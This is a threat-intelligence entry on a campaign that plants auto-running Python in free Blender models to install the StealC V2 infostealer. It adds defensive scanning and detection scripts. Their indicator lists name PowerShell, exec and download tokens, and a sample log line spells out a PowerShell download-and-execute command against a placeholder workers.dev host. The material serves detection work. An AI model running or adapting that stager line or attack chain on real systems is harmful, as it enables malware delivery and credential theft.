
A stealer hiding in Blender 3D models | Kaspersky official blog

Severity: Medium
Tags: Vulnerability, python
Published: Wed Dec 10 2025 (12/10/2025, 17:58:20 UTC)
Source: Kaspersky Security Blog

Description

Researchers have uncovered a campaign where free 3D models for Blender with embedded Python scripts are being used to distribute the StealC V2 infostealer.

AI-Powered Analysis

AI analysis last updated: 01/03/2026, 00:21:41 UTC

Technical Analysis

Researchers have identified a malicious campaign distributing the StealC V2 infostealer through free Blender 3D model files containing embedded Python scripts. Blender, a widely used open-source 3D graphics and animation suite, supports Python scripting to automate tasks and extend functionality. Attackers exploit this feature by uploading .blend files with malicious scripts to popular 3D model marketplaces such as CGTrader. When users download and open these files with Blender’s Auto Run Python Scripts feature enabled, the embedded script executes automatically without user interaction.

The script connects to a remote server hosted on Cloudflare Workers, downloads a malware loader, and executes a PowerShell script that fetches additional payloads. The final payload, StealC V2, is an infostealer capable of extracting data from over 23 browsers, more than 100 browser extensions, 15 cryptocurrency wallet applications, and communication tools including Telegram, Discord, and ProtonVPN. It also bypasses User Account Control (UAC) to escalate privileges.

This attack vector leverages legitimate software features rather than exploiting software vulnerabilities, making it difficult to detect and prevent without proper configuration and awareness. The campaign underscores the risks posed by unvetted third-party content and the lack of security oversight in departments using specialized tools like Blender. The threat is particularly concerning for organizations relying on open-source software and external content marketplaces, as it can lead to significant data breaches and espionage.
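The infection chain above starts with a Text datablock stored inside the .blend file itself, so a defender can triage downloaded models before anyone opens them in Blender. The following is an added example written for this page (it is not Kaspersky's tooling and not part of Blender): it walks the classic .blend file-block layout (12-byte header, then blocks with a 4-byte code, a uint32 length, the old pointer, an SDNA index and a count), counts Text datablocks (ID code "TX") and searches the DATA blocks that follow each one for indicator strings. The indicator list and the sample file built by build_blend() are constructed for the example, and the scan is a heuristic: it does not decode the Text struct's "Register" flag, which would require the file's DNA catalogue.

```python
"""Triage helper for .blend files: list embedded Text datablocks and flag
suspicious Python in them before the file is opened in Blender.

Added example for this page, not Kaspersky's or Blender's code. Assumptions:
the classic uncompressed .blend block layout (Blender 2.x-4.x), Text
datablocks carrying the ID code b"TX", and a constructed indicator list.
"""
import struct
import sys

# Constructed heuristic indicators: strings a defender would not expect in a
# benign modelling helper script. Assumption for this example, not from the article.
INDICATORS = (
    b"subprocess", b"powershell", b"urllib.request", b"base64.b64decode",
    b"os.system", b"exec(", b"workers.dev",
)


def parse_header(data: bytes):
    """Return (pointer_size, little_endian, version) from the 12-byte header."""
    if len(data) < 12 or data[:7] != b"BLENDER":
        raise ValueError("not an uncompressed .blend file (decompress gzip/zstd files first)")
    pointer_size = 8 if data[7:8] == b"-" else 4   # '-' = 64-bit pointers, '_' = 32-bit
    little_endian = data[8:9] == b"v"              # 'v' little-endian, 'V' big-endian
    version = data[9:12].decode("ascii")           # e.g. "400" for Blender 4.0
    return pointer_size, little_endian, version


def iter_blocks(data: bytes):
    """Yield (code, payload) for every file block up to the ENDB terminator."""
    pointer_size, little_endian, _ = parse_header(data)
    end = "<" if little_endian else ">"
    head_fmt = end + "4sI" + ("Q" if pointer_size == 8 else "I") + "II"
    head_len = struct.calcsize(head_fmt)
    pos = 12
    while pos + head_len <= len(data):
        code, size, _old_ptr, _sdna, _count = struct.unpack_from(head_fmt, data, pos)
        pos += head_len
        if code == b"ENDB":
            return
        yield code, data[pos:pos + size]
        pos += size


def scan_blend(data: bytes) -> dict:
    """Count Text datablocks and look for indicators in the DATA blocks that
    follow each one (the text lines of a Text ID are written there)."""
    text_blocks, hits, in_text = 0, [], False
    for code, payload in iter_blocks(data):
        if code.startswith(b"TX"):          # ID block of a Text datablock
            text_blocks += 1
            in_text = True
        elif code == b"DATA" and in_text:   # sub-data of the current Text
            for needle in INDICATORS:
                if needle in payload and needle not in hits:
                    hits.append(needle)
        else:                               # any other block ends the Text's data
            in_text = False
    return {"text_blocks": text_blocks, "indicators": hits,
            "suspicious": text_blocks > 0 and bool(hits)}


def build_blend(blocks, pointer_size=8) -> bytes:
    """Assemble a minimal synthetic little-endian .blend (constructed for testing only)."""
    fmt = "<4sI" + ("Q" if pointer_size == 8 else "I") + "II"
    out = bytearray(b"BLENDER" + (b"-" if pointer_size == 8 else b"_") + b"v400")
    for code, payload in blocks:
        out += struct.pack(fmt, code, len(payload), 0, 0, 1) + payload
    out += struct.pack(fmt, b"ENDB", 0, 0, 0, 0)
    return bytes(out)


# Constructed sample: a mesh, a Text datablock whose line invokes PowerShell,
# then an object whose own DATA must not be attributed to the Text.
SAMPLE = build_blend([
    (b"ME\x00\x00", b"\x00" * 16),
    (b"TX\x00\x00", b"\x00" * 16),
    (b"DATA", b"import subprocess; subprocess.run(['powershell', '-enc', 'AAA'])\x00"),
    (b"OB\x00\x00", b"\x00" * 16),
    (b"DATA", b"os.system\x00"),
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    print(scan_blend(blob))
```

Run it as `python scan_blend.py model.blend`; files saved with Blender's compression option start with a gzip or zstd magic rather than "BLENDER" and must be decompressed first. A hit is a reason to inspect the file in a sandbox, not proof of malice, and scanning complements rather than replaces turning the preference off: Blender exposes it as bpy.context.preferences.filepaths.use_scripts_auto_execute and as the -Y/--disable-autoexec launch switch.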

Potential Impact

For European organizations, especially those in creative industries, media production, architecture, and visualization sectors that commonly use Blender, this threat poses a significant risk of data theft and operational compromise. The StealC infostealer’s ability to harvest credentials, browser data, crypto wallets, and communications can lead to intellectual property theft, financial fraud, and exposure of sensitive corporate information. The attack can also facilitate lateral movement within networks if attackers leverage stolen credentials. Since the infection vector is embedded in freely available 3D models, employees downloading unvetted content can inadvertently compromise corporate devices. This risk is exacerbated in organizations without strict software usage policies or security awareness training. The stealthy nature of the attack, leveraging legitimate automation features, complicates detection and response. Additionally, the use of cloud-based infrastructure for payload delivery can bypass traditional network defenses. Overall, the threat can result in confidentiality breaches, loss of trust, regulatory penalties under GDPR, and financial losses.

Mitigation Recommendations

European organizations should take the following steps:

- Disable Blender’s Auto Run Python Scripts feature immediately, so that scripts embedded in downloaded .blend files cannot execute when the file is opened.
- Implement strict policies prohibiting the use of unapproved third-party tools and content, including 3D models from untrusted sources, and conduct thorough risk assessments before adopting new software or content platforms.
- Deploy endpoint detection and response (EDR) solutions that monitor script execution and PowerShell activity to detect suspicious behaviour.
- Regularly train employees on the risks of downloading and opening files from external marketplaces, emphasizing the dangers of automation features.
- Enforce application whitelisting and restrict PowerShell execution policies to limit malware execution.
- Integrate sandboxing or file-scanning solutions that can analyze 3D model files and their embedded scripts before use.
- Maintain up-to-date threat intelligence feeds to monitor emerging campaigns targeting creative software.
- Enforce multi-factor authentication and network segmentation to limit the damage from credential theft.
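The EDR recommendation above maps to one concrete process-tree check: Blender's embedded Python runs inside blender.exe, so in this chain the PowerShell stager appears as a child of blender.exe. The following is an added example written for this page, not Kaspersky's or any EDR vendor's rule. It runs that logic over constructed Sysmon-style process-creation records; the field names (EventID, Image, ParentImage, CommandLine), the list of script hosts and the command-line tokens are assumptions for the example, and the install path and workers.dev host in the sample are constructed placeholders.

```python
"""Detect blender.exe spawning a script host, with a higher severity when the
command line looks like a download-and-execute stager.

Added example for this page; not Kaspersky's or any vendor's detection rule.
Log records are constructed, Sysmon Event ID 1-style JSON lines (assumption).
"""
import json
from pathlib import PureWindowsPath
from typing import Optional, Tuple

# Script hosts a 3D modelling tool has no reason to launch (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments typical of download/encoded stagers (constructed list).
DOWNLOAD_TOKENS = ("downloadstring", "invoke-webrequest", "iwr ", "-enc",
                   "frombase64string", "workers.dev")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) when the event matches, else None."""
    if event.get("EventID") != 1:                 # only process-creation events
        return None
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    if parent != "blender.exe" or child not in SCRIPT_HOSTS:
        return None
    if any(tok in cmd for tok in DOWNLOAD_TOKENS):
        return ("high", f"blender.exe spawned {child} with a download/encoded command line")
    return ("medium", f"blender.exe spawned script host {child}")


def scan_events(lines) -> list:
    """Parse JSON lines and collect alerts for matching events."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        verdict = classify(event)
        if verdict:
            alerts.append({"ProcessId": event.get("ProcessId"),
                           "severity": verdict[0], "reason": verdict[1]})
    return alerts


# Constructed sample log: a benign Blender launch, the stager, a bare cmd.exe
# child, an unrelated PowerShell and a network event that must be ignored.
SAMPLE_LOG = r"""
{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Program Files\\Blender Foundation\\Blender 4.2\\blender.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "blender.exe C:\\Users\\art\\Downloads\\free_car_model.blend"}
{"EventID": 1, "ProcessId": 4188, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Blender Foundation\\Blender 4.2\\blender.exe", "CommandLine": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://example-placeholder.workers.dev/loader')"}
{"EventID": 1, "ProcessId": 4201, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Blender Foundation\\Blender 4.2\\blender.exe", "CommandLine": "cmd.exe /c dir"}
{"EventID": 1, "ProcessId": 4302, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Users\\art\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", "CommandLine": "powershell.exe -NoLogo"}
{"EventID": 3, "ProcessId": 4188, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationHostname": "example-placeholder.workers.dev"}
"""

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_LOG.splitlines()):
        print(alert)
```

The parent/child pair alone is worth a medium alert because Blender has no routine reason to launch a shell; the command-line tokens only raise the severity, so a stager that avoids every token still surfaces. In production the same logic belongs in the EDR or SIEM rule language rather than a script, and should be paired with the Auto Run Python Scripts preference being disabled so the alert is a backstop rather than the only control.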


Technical Details

Article Source: https://www.kaspersky.com/blog/malicious-blender-model-files/54948/ (fetched 2025-12-10T18:06:24.764Z, 1025 words)

Threat ID: 6939b6a0fe7b3954b6891b08

Added to database: 12/10/2025, 6:06:24 PM

Last enriched: 1/3/2026, 12:21:41 AM

Last updated: 2/7/2026, 1:02:07 PM

